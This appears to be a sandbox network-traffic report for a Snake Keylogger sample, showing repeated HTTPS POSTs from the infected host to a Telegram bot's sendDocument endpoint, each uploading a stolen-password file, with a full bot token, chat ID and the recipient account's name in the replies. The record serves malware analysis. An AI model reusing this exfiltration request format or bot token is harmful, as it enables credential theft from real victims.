                            156192.168.2.550011149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:45 UTC263OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fc3abb98
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:45 UTC263OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 63 33 61 62 62 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fc3abb98Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:45 UTC264INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:45 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:45 UTC264INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66922,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228825,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            157192.168.2.550012149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:45 UTC265OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fc767c16
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:45 UTC265OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 63 37 36 37 63 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fc767c16Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:46 UTC265INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:46 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:46 UTC266INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66923,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228826,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            158192.168.2.550013149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:46 UTC266OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fcc300e3
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:46 UTC267OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 63 63 33 30 30 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fcc300e3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:46 UTC267INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:46 GMT
                            Content-Type: application/json
                            Content-Length: 506
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:46 UTC268INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66924,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228826,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            159192.168.2.550014149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:46 UTC268OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fd0035e8
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:46 UTC268OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 64 30 30 33 35 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fd0035e8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:46 UTC269INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:46 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:46 UTC269INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66925,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228826,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            16192.168.2.549784149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:44 UTC27OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d82988cb
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:44 UTC27OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 38 32 39 38 38 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d82988cbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:45 UTC27INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:45 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:45 UTC28INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66763,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228765,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            160192.168.2.550015149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:47 UTC270OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fd35462b
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:47 UTC270OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 64 33 35 34 36 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fd35462bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:47 UTC271INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:47 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:47 UTC271INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66926,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228827,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            161192.168.2.550016149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:47 UTC271OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fd90de94
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:47 UTC272OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 64 39 30 64 65 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fd90de94Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:48 UTC272INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:48 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:48 UTC273INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66928,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228827,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            162192.168.2.550017149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:48 UTC273OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fddd29b8
                            Host: api.telegram.org
                            Content-Length: 504
